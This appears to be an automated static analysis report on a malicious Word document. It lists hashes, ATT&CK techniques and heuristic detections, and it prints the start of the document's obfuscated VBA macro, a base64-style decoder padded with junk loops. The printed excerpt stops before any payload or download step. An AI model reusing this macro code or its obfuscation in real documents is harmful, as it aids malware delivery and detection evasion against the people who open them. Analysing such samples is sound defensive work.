Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 64de5c83da91a770…

MALICIOUS

Office (OLE)

123.5 KB Created: 2018-04-20 03:13:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 5a4ea7e64823ba47e5e520a866f7bd67 SHA-1: cdee595fb6820d155d15516261474d7b805d356e SHA-256: 64de5c83da91a7709d09d0d273cbfe1277d0c7d45dd556223e486c34748f5796
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro, detected by multiple heuristics, is designed to execute code upon opening. The presence of CreateObject and the detection of obfuscated code suggest the macro is intended to download and execute a second-stage payload, a common technique for malware delivery.

Heuristics 9

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 86555 bytes
SHA-256: 6fc883737334c65d0e08214177c98f2e995aae8e2dc548df9999d86ca3846a05
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BOrcFm"
Public Function jaV8Da7ShLvlFnqN(FDn1sCwz0dsCiQg As String, Optional qSzB3RbZEVvIRBW As Boolean = True) As String
Static mNi7QFlw6oojf7(0 To 255) As Byte
Dim RB9Rgc9blpqUE2 As Object
Dim sUMHumjboQav6y As Object
Dim jlJwnLV7lAU9() As Byte, uevdYX8JPV7uWYP() As Byte
Dim WbKa1MQDwJwVWK As String
Dim hirgQN45CHb As String
hirgQN45CHb = gIcA5pENbd6
WbKa1MQDwJwVWK = eOwPR0rk6mS
If (StrComp(WbKa1MQDwJwVWK, hirgQN45CHb, vbTextCompare) <> 0) Then
MsgBox ("Optional: dA4XqVbMfZC8OE.")
End If
Dim lRxVaB2mDG9tRcWgRF As Long, ERDZBL0lnmniHjs5 As Long
Dim aHQ61K3fW7Se7V As Object
If mNi7QFlw6oojf7(0) = 0 Then
Dim XY6j6HFZW5YDhh As Integer
For lRxVaB2mDG9tRcWgRF = 0 To 255
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF) = 255
Dim R19aKZar39f0PH As Integer
For w1zFeHBCa5j = 5 To 57
R19aKZar39f0PH = w1zFeHBCa5j
Next w1zFeHBCa5j
Next lRxVaB2mDG9tRcWgRF
Dim tezxL96XhuiVkM As Object
Dim XwsiFErZmeMnyG As Integer
For YRHmJgIHhFn = 8 To 86
XwsiFErZmeMnyG = YRHmJgIHhFn
Next YRHmJgIHhFn
For lRxVaB2mDG9tRcWgRF = 0 To 25
Dim WQxFMnc3UbwCSy As Integer
For AnwSBFTAI0Z = 4 To 43
WQxFMnc3UbwCSy = AnwSBFTAI0Z
Next AnwSBFTAI0Z
Dim NiLAqlTWdBK8hN As Integer
Dim t2jBCKUSEBb As String
NiLAqlTWdBK8hN = 9959
Dim tfYY9D8sBJv As Integer
t2jBCKUSEBb = Right(CStr(NiLAqlTWdBK8hN), 1)
tfYY9D8sBJv = CInt(t2jBCKUSEBb)
For LJbSyKzbyNW = tfYY9D8sBJv To 51
NiLAqlTWdBK8hN = NiLAqlTWdBK8hN + 3
Next LJbSyKzbyNW
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF + 65) = lRxVaB2mDG9tRcWgRF
Next lRxVaB2mDG9tRcWgRF
Dim aIYfkldwFGeSta, mJ4XcjCHcrr As String
aIYfkldwFGeSta = 2
mJ4XcjCHcrr = 1
#If aIYfkldwFGeSta > mJ4XcjCHcrr Then
Dim HsQY7spWOug As LongPtr
#Else
Dim HsQY7spWOug As Integer
HsQY7spWOug = 2 + 1
Dim XC5vYX0KNFX As Integer
For XC5vYX0KNFX = 0 To aIYfkldwFGeSta
XC5vYX0KNFX = XC5vYX0KNFX + 1
Next XC5vYX0KNFX
#End If
For lRxVaB2mDG9tRcWgRF = 26 To 51
Dim svOe2L9swYJ3gy As Object
Dim CM3i1FszViQRYZ, CCD3WjKQvw9 As Integer
CM3i1FszViQRYZ = 5
CCD3WjKQvw9 = 4
#If TYNcz7VYrOo <> 0 Then
TYNcz7VYrOo = TYNcz7VYrOo + 6
Dim brkdVALpmRu As Variant
Else
Dim brkdVALpmRu As Object
#End If
If CM3i1FszViQRYZ > CCD3WjKQvw9 Then
For PMWKiI3XwaHier = CCD3WjKQvw9 To CM3i1FszViQRYZ
CCD3WjKQvw9 = CCD3WjKQvw9 / CM3i1FszViQRYZ
Next PMWKiI3XwaHier
End If
Dim kmGAGmZNeUcOZI As String
Dim Fw0pnFrXEHx As String
Fw0pnFrXEHx = syPPpNrV602
kmGAGmZNeUcOZI = eeP5LqZWsJG
If (StrComp(kmGAGmZNeUcOZI, Fw0pnFrXEHx, vbTextCompare) <> 0) Then
MsgBox ("Optional: KMFXecAcUi9LPy.")
End If
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF + 71) = lRxVaB2mDG9tRcWgRF
Dim DuGbV0kgeMFzgY As String
DuGbV0kgeMFzgY = Application.UserName
Dim ai8v3kDak1R, scroJET6oJPJ7Y As Integer
scroJET6oJPJ7Y = Len(DuGbV0kgeMFzgY)
Dim UcaYHqEPRoe As Collection
While scroJET6oJPJ7Y > 9
ai8v3kDak1R = ai8v3kDak1R + 4
scroJET6oJPJ7Y = scroJET6oJPJ7Y - 9
Wend
Dim QzlzKa48Al4uqX, CXVrlzS97hd As Integer
QzlzKa48Al4uqX = 2
CXVrlzS97hd = 9
#If cVt8VLpQ1oF <> 0 Then
cVt8VLpQ1oF = cVt8VLpQ1oF + 6
Dim fSrPMZ4w3Xu As Variant
Else
Dim fSrPMZ4w3Xu As Object
#End If
If QzlzKa48Al4uqX > CXVrlzS97hd Then
For yqLTDD5KT0DTmE = CXVrlzS97hd To QzlzKa48Al4uqX
CXVrlzS97hd = CXVrlzS97hd / QzlzKa48Al4uqX
Next yqLTDD5KT0DTmE
End If
Next lRxVaB2mDG9tRcWgRF
Dim kNE4Lkexy9M2HT As Integer
Dim TvE4BaGkIvP As String
kNE4Lkexy9M2HT = 3279
Dim Y2MmDBvz1BM As Integer
TvE4BaGkIvP = Right(CStr(kNE4Lkexy9M2HT), 1)
Y2MmDBvz1BM = CInt(TvE4BaGkIvP)
For KIftvZ0ZA6k = Y2MmDBvz1BM To 33
kNE4Lkexy9M2HT = kNE4Lkexy9M2HT + 1
Next KIftvZ0ZA6k
For lRxVaB2mDG9tRcWgRF = 52 To 61
Dim qDkWUhV0o4a5oz As Integer
Dim txuCMmOY0uGy63 As String
Dim RXTiBrRXLh3 As String
RXTiBrRXLh3 = UXyDDvYqw09
txuCMmOY0uGy63 = YQGDnM2vYnk
If (StrComp(txuCMmOY0uGy63, RXTiBrRXLh3, vbTextCompare) <> 0) Then
MsgBox ("Optional:
... (truncated)